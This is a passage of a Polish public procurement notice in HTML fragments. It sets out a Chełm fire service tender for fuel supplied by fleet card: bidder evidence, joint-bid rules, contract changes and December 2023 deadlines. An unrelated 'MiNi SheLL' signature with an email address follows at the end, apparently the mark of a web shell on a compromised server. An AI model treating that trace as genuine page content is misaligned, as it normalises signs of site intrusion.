Wykonawca nie może po upływie terminu składania ofert powoływać na sytuację<br/> podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on <br/> w danym zakresie na sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia braku podstaw do wykluczenia z postępowania Zamawiający<br/> żąda:<br/>2.2.1. informacji z krajowego Rejestru Karnego w zakresie art.108 ust.1 pkt.1 i 2 oraz art.108<br/> ust.1 pkt.4 ustawy PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienia<br/> publiczne tytułem środka karnego sporządzonej nie wcześniej niż 6 miesięcy przed jej<br/> złożeniem;<br/>2.2.2. oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy PZP, o braku<br/> przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/> 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U z 2021 poz. 275 ze zm.),<br/> z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności<br/> do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/> potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego<br/> do tej samej grupy kapitałowej (załącznik nr 4 do SWZ).<br/>2.2.3. odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy<br/> PZP, sporządzanych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/> przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykonaniu, a przypadku świadczeń okresowych lub ciągłych również wykonywaniu <br/> okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/> prowadzenia działalności jest krótszy – w tym okresie sukcesywnych dostaw paliw<br/> ciekłych o wartości co najmniej 150 000 zł brutto albo równowartości tej kwoty<br/> wyrażonej w innej walucie eg średniego kursu złotego NBP (tabela A) z dnia publikacji<br/> ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych;<br/>2.3.2. dysponowaniu systemem kart flotowych bezgotówkowego rozliczania tankowań <br/> w ilości minimum 10 kart;<br/>2.3.3. dysponowaniu na terenie miasta Chełm co najmniej jedną całodobową stacją paliw<br/> płynnych z możliwością tankowania tradycyjnego oraz z wykorzystaniem<br/> dedykowanych kart paliwowych samochodów osobowych i ciężarowych o masie ponad<br/> 16 000 kg wyposażoną w dystrybutor dodatku do paliwa AdBlue.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności<br/> cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia <br/> na następującą minimalna sumę gwarancyjną t.j. 150 000 zł lub równowartość tej<br/> kwoty wyrażoną w walucie obcej wg średniego kursu złotego NBP (Tabela A) z dnia<br/> publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych lub<br/>2.4.2. informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/> wysokość posiadanych środków finansowych oraz zdolność kredytową Wykonawcy<br/> w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem na minimalną kwotę<br/> t.j. 150 000 zł lub równowartość tej kwoty wyrażoną w walucie obcej wg średniego<br/> kursu złotego NBP (Tabela A) z dnia publikacji ogłoszenia o zamówieniu w Biuletynie<br/> Zamówień Publicznych przy czym Zamawiający dopuszcza możliwość sumowania<br/> kwoty ubezpieczenia, posiadanych środków finansowych oraz zdolności kredytowej<br/> w celu uzyskania wymaganego minimum w zakresie sytuacji ekonomicznej<br/> i finansowej. Jeżeli natomiast z uzasadnionej przyczyny Wykonawca nie może złożyć<br/> wymaganych przez Zamawiającego podmiotowych środków dowodowych o których<br/> mowa w pkt. 2.4. Wykonawca składa inne podmiotowe środki dowodowe, które <br/> w wystarczający sposób potwierdzą spełnienie opisanego przez Zamawiającego<br/> warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>2.5. w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu<br/> dotyczącym zdolności technicznej lub zawodowej Zamawiający żąda:<br/>2.5.1. wykazu wykonanych dostaw, a przypadku świadczeń powtarzających się lub ciągłych<br/> również wykonywanych, o cechach określonych w sekcji 8 pkt. 2.3.1 w okresie<br/> ostatnich 5 lat przed upływem terminu składania ofert, jeżeli okres prowadzenia<br/> działalności jest krótszy – w tym okresie wraz z podaniem ich wartości , przedmiotu,<br/> dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są<br/> wykonywane oraz załączeniem dowodów określających czy te dostawy zostały<br/> wykonane należycie lub są wykonywane należycie w przypadku świadczeń<br/> powtarzających się lub ciągłych, przy czym dowodami, o których mowa, są referencje<br/> bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały<br/> wykonane lub są wykonywane, jeżeli Wykonawca z przyczyn niezależnych od niego<br/> nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy. W przypadku<br/> świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/> dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie<br/> ostatnich 3 miesięcy. <br/>2.5.2. wykazu ogólnodostępnych stacji paliw płynnych na terenie Miasta Chełm, którymi<br/> Wykonawca będzie dysponował (minimum 1) przez okres obowiązywania umowy,<br/> umożliwiającą tankowanie pojazdów oraz sprzętu w systemie bezgotówkowym. <br/>2.6. wykonawca, który powołuje się na zasoby innych podmiotów w celu wykazania braku<br/> istnienia wobec nich podstaw do wykluczenia z postępowania składa również:<br/>2.6.1. oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału <br/> w postępowaniu dotyczące tych podmiotów <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zapotrzebowanie na paliwo i dodatki.<br/>2. Formularz ofertowy<br/>3. Oświadczenie JEDZ (nie wymagane w niniejszym postępowaniu)<br/>4. Oświadczenie składane na podstawie art. 108 ust 1 pkt. 5 ustawy PZP<br/>5. Oświadczenie dotyczące aktualności informacji w zakresie następujących podstaw do wykluczenia z postępowania wskazanych przez Zamawiającego (tj. 108 ust 1, pkt.3,5.6 ustawy PZP);<br/>6. Wykaz stacji paliw na terenie Miasta Chełm<br/>7. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby na potrzeby realizacji zamówienia;<br/>8. Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>9. Projekt umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W tym wypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/> w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu <br/> i zawarcia umowy w sprawie zamówienia publicznego. Wzór pełnomocnictwa został<br/> zawarty w zał. nr 8 do SWZ.<br/>3. Do wykonawców ubiegających się wspólnie o udzielenie zamówienia stosuje się przepisy<br/> o Wykonawcach ubiegających się indywidualnie o udzielenie zamówienia.<br/>4. Warunek dotyczący doświadczenia w należytym wykonaniu lub wykonywaniu dostaw,<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego mogą spełnić,<br/> jeżeli jeden, niektórzy lub wszyscy Wykonawcy wspólnie ubiegający się o udzielenie<br/> zamówienia wykażą należyte wykonanie lub wykonywanie sukcesywnych dostaw paliw<br/> płynnych w systemie bezgotówkowym z wykorzystaniem kart paliwowych o łącznej<br/> wartości co najmniej 150 000 zł brutto.<br/>5. Warunek dotyczący dysponowania stacjami paliw, Wykonawcy wspólnie ubiegający się <br/> o udzielenie zamówienia publicznego mogą spełnić jeżeli jeden, niektórzy lub wszyscy<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykażą spełnienie tego<br/> warunku.<br/>6. Warunek dotyczący sytuacji finansowej lub ekonomicznej Wykonawcy wspólnie ubiegający<br/> się o udzielenie zamówienia mogą spełnić w następujący sposób:<br/>6.1. poprzez przedstawienie jednego dokumentu potwierdzającego, że wszyscy Wykonawcy<br/> wspólnie ubiegający się o udzielenie zamówienia są ubezpieczeni od odpowiedzialności<br/> cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia <br/> na minimalna sumę gwarancyjną 150 000 zł albo równowartość tej kwoty wyrażona <br/> w innej walucie wg średniego kursu złotego NBP (Tabela A) z dnia publikacji ogłoszenia<br/> o zamówieniu w Biuletynie Zamówień Publicznych lub odrębnie poprzez przedstawienie<br/> przez jednego, niektórych lub wszystkich wykonawców ubiegających się wspólnie <br/> o udzielenie zamówienia odrębnych dokumentów potwierdzających, że Wykonawcy <br/> ci są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/> związanej z przedmiotem zamówienia, na łączną minimalna kwotę 150 000 zł <br/> lub równowartość tej kwoty wyrażona w innej walucie na zasadach określonych powyżej<br/> albo<br/>6.2. poprzez przedstawienie przez wszystkich, niektórych lub jednego z Wykonawców<br/> ubiegających się wspólnie o udzielenie zamówienia informacji banku lub spółdzielczej<br/> kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/> finansowych lub zdolność kredytową w okresie nie wcześniejszym niż 3 miesiące przed<br/> jej założeniem na łączną minimalna kwotę 150 000 zł lub równowartość wyrażona <br/> w innej walucie wg średniego kursu złotego NBP (Tabela) a z dnia publikacji<br/> ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych;<br/>6.3. Zamawiający dopuszcza również sumowanie potencjałów poszczególnych Wykonawców<br/> wspólnie ubiegających się o udzielenie zamówienia publicznego wynikającego <br/> z posiadanego ubezpieczenia od odpowiedzialności cywilnej, zdolności kredytowej oraz<br/> posiadanych środków finansowych.<br/>7. Warunek niepodlegania wykluczeniu z postępowania każdy z Wykonawców wspólnie<br/> ubiegających się o udzielenie zamówienia spełnia odrębnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Konieczność przedłużenia terminu umownego rozpoczęcia wykonywania umowy <br/> z uwagi na:<br/>1.1.1.uwarunowania społeczne np. protesty, strajki, ko flity zbrojne itp.;<br/>1.1.2. korzystanie przez osoby uprawnione ze środków prawnych przewidzianych przez<br/> obowiązujące przepisy prawne (w szczególności: odwołania do Krajowej Izby<br/> Odwoławczej, skargi do Sądu Zamówień publicznych, powództwa sądowe);<br/>1.1.3. wystąpienie siły wyższej, przez która rozumie się zdarzenie lub połączenie<br/> zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają<br/> wykonanie części lub całości zobowiązań wynikających z umowy, których strony<br/> nie mogły wcześniej przewidzieć i którym nie mogły przeciwdziałać poprzez<br/> działanie z należytą starannością ogólnie przewidziana dla cywilnoprawnych<br/> stosunków zobowiązaniowych o okres opóźniający lub wstrzymujący realizację<br/> zamówienia;<br/>1.2. wystąpienie zmian powszechnie obowiązujących przepisów prawa w zakresie<br/> mającym wpływ na realizacje przedmiotu umowy.<br/><br/>2. Na podstawie art. 455 ust 1 pkt. 4 ustawy Prawo zamówień publicznych, strony<br/> dopuszczają dokonywanie zmiany niniejszej umowy w stosunku do treści złożonej <br/> oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku powstania<br/> okoliczności, których strony nie mogły wcześniej przewidzieć i którym nie mogły<br/> przeciwdziałać. <br/>3. Zmiana umowy będzie uwarunkowana doręczeniem Zamawiającemu przez <br/> Wykonawcę lub odpowiednio Wykonawcy przez Zamawiającego pisemnego<br/> zawiadomienia informującego o wystąpieniu zdarzenia uzasadniającego zmianę<br/> umowy w terminie nie później niż 7 dni od dnia w którym Wykonawca lub<br/> odpowiednio Zamawiający dowiedział się o wystąpieniu określonego zdarzenia <br/> z zastrzeżeniem ust. 5.<br/>4. Każda zmiana postanowień umowy wymaga zachowania formy pisemnej pod <br/> rygorem nieważności takiej zmiany i może zostać wprowadzona jedynie w przypadku<br/> akceptacji obu Stron (Zamawiający i Wykonawca) faktu zaistnienia okoliczności <br/> uzasadniających zmianę, oraz że wprowadzenie zmiany jest konieczne dla<br/> prawidłowej i niezakłóconej realizacji przedmiotu zamówienia.<br/>5. Procedura zmiany umowy w przypadku zaistnienia okoliczności, o których mowa <br/> w ust. 2 , będzie dokonywana na zasadach określonych w ustawie, o której mowa <br/> w ust. 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.lubelskie.straz.gov.pl/ &gt;JEDNOSTKI,-&gt; KM PSP CHEŁM.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-27 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com